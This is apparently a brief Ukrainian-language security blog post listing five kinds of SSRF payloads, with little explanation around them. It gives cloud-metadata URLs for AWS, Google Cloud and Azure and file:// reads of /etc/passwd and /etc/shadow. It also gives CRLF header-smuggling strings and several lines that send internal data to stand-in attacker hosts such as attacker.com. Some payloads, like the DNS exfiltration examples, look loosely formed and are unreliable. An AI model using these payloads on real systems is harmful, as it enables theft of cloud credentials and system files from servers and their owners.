5 SSRF payload

SSRF (Server-Side Request Forgery) – це вразливість веб-застосунку, яка дозволяє зловмиснику надсилати підроблені запити від імені самого сервера.

TOOLS FOR FIND VULNERABILITY

Логин Свят

2/12/20251 min read

5 часто використовуваних SSRF-навантажень

SSRF (Server-Side Request Forgery) – це вразливість веб-застосунку, яка дозволяє зловмиснику надсилати підроблені запити від імені самого сервера.

SSRF-пейлоади – це спеціально сформовані запити, які зловмисник впроваджує у вразливий веб-застосунок. SSRF-пейлоади можуть включати маніпуляції з URL-адресами, використання спеціальних схем (наприклад, file://, ftp://), експлойти протокольного smuggling, звернення до метаданих хмарних провайдерів та інші техніки для досягнення своїх цілей.

1. Сканування внутрішньої мережі

🔹 Отримання метаданих з інстансів AWS EC2:

http://169.254.169.254/latest/meta-data/

🔹 Отримання метаданих з інстансів Google Cloud:

http://metadata.google.internal/computeMetadata/v1/instance/

🔹 Отримання метаданих з інстансів Azure:

http://169.254.169.254/metadata/v1/

2. Отримання файлів

🔹 Отримання вмісту файлу /etc/passwd:

file:///etc/passwd

🔹 Отримання вмісту файлу /etc/shadow (якщо доступно):

file:///etc/shadow

🔹 Отримання вмісту файлу boot.ini (Windows):

file:///c:/boot.ini

3. Взаємодія з зовнішніми сервісами

🔹 Отримання вмісту внутрішнього сайту та надсилання його на сервер зловмисника:

http://attacker.com/?url=http://internal.site.com/

🔹 Спроба підключитися до FTP-сервера, керованого зловмисником:

ftp://attacker.com/

4. Протокольний smuggling

🔹 Використання протокольного smuggling для зміни заголовка Host:

http://internal.site.com:80%0d%0aHost: attacker.com%0d%0a

🔹 Додавання фрагмента URL для введення сервера в оману, щоб він вважав, що запит призначений для attacker.com:

http://internal.site.com:80%23attacker.com

5. Експлуатація витоку даних через DNS

🔹 Використання DNS-запиту для передачі даних на сервер, контрольований зловмисником:

http://attacker.com/?url=http://x.x.x.x/

🔹 Використання піддомену для ексфільтрації даних на сервер зловмисника:

http://attacker.com/?url=http://attacker.com.x.x.x.x.evilsite.com/